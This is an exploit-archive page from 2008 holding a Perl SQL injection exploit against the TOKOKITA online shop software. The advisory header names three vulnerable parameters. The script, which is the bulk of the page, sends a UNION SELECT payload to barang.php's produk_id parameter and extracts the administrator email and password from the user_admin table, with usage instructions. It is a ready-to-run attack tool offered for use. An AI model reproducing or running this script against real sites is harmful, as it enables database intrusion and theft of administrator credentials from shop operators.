[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit
# Published : 2008-06-24
# Author : k1tk4t
# Previous Title : Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability
# Next Title : emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit
#!/usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# TOKOKITA Multiple Remote SQL Injection
# Demosite : http://www.tokokita.net/toko/
# Vendor : http://www.tokokita.com/
# Kutu : 1. catlist.php?cat_id=[Blind SQLi]
# 2. catlist_detail.php?cat_id=[Blind SQLi]
# 3. barang.php?produk_id=[SQLi]
# Terimakasih untuk ;
# str0ke,DNX,n0c0py,L41n,
# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
# eCHo->[y3dips,K-159,lirva32,dan staff lainnya]
use LWP::UserAgent;
if ( !$ARGV[1] ) {
print "n //////////////////////////////////////////////////////////////////";
print "n // ..::> k1tk4t <::.. //";
print "n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
print "n //////////////////////////////////////////////////////////////////";
print "n[!] ";
print "n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
print "n[!] Contoh : perl tokokita.pl localhost /toko/";
print "n[!] ";
print "n";
exit;
}
$site = $ARGV[0];
$path = $ARGV[1];
$sqlinj = "union+
select+
null,
null,
null,
concat(0x6b3174,email,0x316e),
null,
concat(0x6b3474,password,0x307574),
null,
null,
null,
null,
null+
from+
user_admin/*";
$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
. $sqlinj;
$www = new LWP::UserAgent;
print "nn [!] Injeksi SQL n";
$res = $www->get($expl) or err ();
$hasil = $res->content;
if ( $hasil =~ /k1t(.*?)1n/ ) {
print "n [+] Username : $1";
$hasil =~ /k4t(.*?)0ut/, print "n [+] Password : $1";
print "nn";
}
else {
print "n [-] Exploit gagal ;)";
exit();
}
# www.Syue.com [2008-06-24]